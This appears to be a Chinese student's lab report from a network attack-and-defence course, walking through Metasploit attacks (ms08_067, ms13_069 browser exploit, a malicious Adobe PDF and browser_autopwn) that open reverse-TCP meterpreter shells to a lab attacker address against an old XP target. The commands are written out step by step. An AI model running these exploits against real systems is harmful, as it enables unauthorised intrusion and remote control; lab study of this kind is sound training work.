• 2018-2019-2 20165337《网络攻防技术》Exp5 MSF基础应用


    一、实践目标

    1.一个主动攻击实践

    ms08_067

    2.一个针对浏览器的攻击

    ms13-069

    3.一个针对客户端的攻击

    adobe (Adobe_toolbutton客户端漏洞)

    4.成功应用任何一个辅助模块

    auxiliary/server/browser_autopwn模块

    问题回答:

    用自己的话解释什么是exploit,payload,encode
    exploit:用来打开攻击者与被攻击者的通道,开始攻击。核弹头
    payload:攻击载荷,用什么方式攻击。核弹载具
    encode:进行编码,让它不被发现。隐形轰炸机

    二、实验内容

    1.主动攻击(ms08_067)

    首先输入nmap -sS -A --script=smb-vuln-ms08-067 -PO 靶机IP地址查看靶机是否存在该漏洞

    然后在攻击机Kali的命令行中输入msfconsole进入控制台
    输入use exploit/windows/smb/ms08_067_netapi使用这个漏洞
    之后输入show options查看需要设置的参数

    设置完靶机地址就可以完成
    输入exploit进行攻击

    2.针对浏览器的攻击(ms13-069)

    首先search ms13找到ms13-069

    输入use exploit/windows/browser/ms13_069_caret
    输入show options
    查看需要设置的参数

    设置参数:
    srvhost 192.168.1.154
    srvport 80
    set payload windows/meterpreter/reverse_tcp
    lhost 192.168.1.154
    输入exploit进行攻击

    攻击成功获取权限

    3.一个针对客户端的攻击(Adobe_toolbutton)

    首先在msfconsole控制台中search adobe

    之后use exploit/windows/fileformat/adobe_toolbutton

    生成攻击文件msf.pdf

    将这个文件传入靶机

    设置监听程序use exploit/mutil/handler

    设置攻击机IP 192.168.1.154
    设置攻击机端口4444
    设置set payload windows/meterpreter/reverse_tcp
    输入exploit进行攻击
    在靶机上打开PDF文件

    攻击成功获取权限

    4.成功应用辅助模块(auxiliary/server/browser_autopwn模块)

    Metasploit中提供了一个browser autopwn模块,这是一个可以用来对各种浏览器进行测试和渗透的自动化向量。
    autopwn指的是自动对目标进行渗透。autopwn模块在配置了所有要使用的浏览器渗透脚本后,将处于监听模式下。然后,它便等待着一个即将到来的连接。一旦连接建立,它就会发送一系列与目标浏览器相匹配的渗透模块,具体发送哪个模块要取决于受害者浏览器的类型。无论目标系统上运行着什么浏览器,只要存在漏洞,autopwn模块就能自动发起攻击。

    在msfconsole中搜索autopwn
    输入use auxiliary/server/browser_autopwn
    之后输入show options查看需要设置的参数

    设置参数:
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.1.154
    set URIPATH "20165337yy"
    输入exploit进行攻击

    输入 session -i 1成功获得权限

    三、实验总结:

    离实战还缺些什么技术或步骤?

    只能攻击最低级的漏洞,靶机稍微有点防护能力就无法进攻,还是拷贝同学的一款容易攻破的靶机完成的实验

    实验感想

    最难的就是找到合适的靶机,之前自己找了很多靶机一个都不能成功,当时心都碎了。找了一堆淘汰了不知道多久的xp系统都无法攻破。后来用同学的靶机才顺利完成实验。总结下来只有靶机心甘情愿甚至全力配合,我才能攻击成功...

  • 相关阅读:
    NOIP2013 花匠解题报告
    (3) 深入理解SELinux SEAndroid(第三部分
    (2) 深入理解SELinux SEAndroid(第二部分)
    (1) 深入理解SELinux SEAndroid(第一部分)
    SELinux深入理解
    SELinux策略语言--类型强制(编写TE规则)
    Android 6.0中SELinux的TE简介
    8250_fintek
    run "setprop ctrl.start wpa_supplicant" manually
    AOSP Nougat
  • 原文地址:https://www.cnblogs.com/y963976867/p/10746603.html
Copyright © 2020-2023  润新知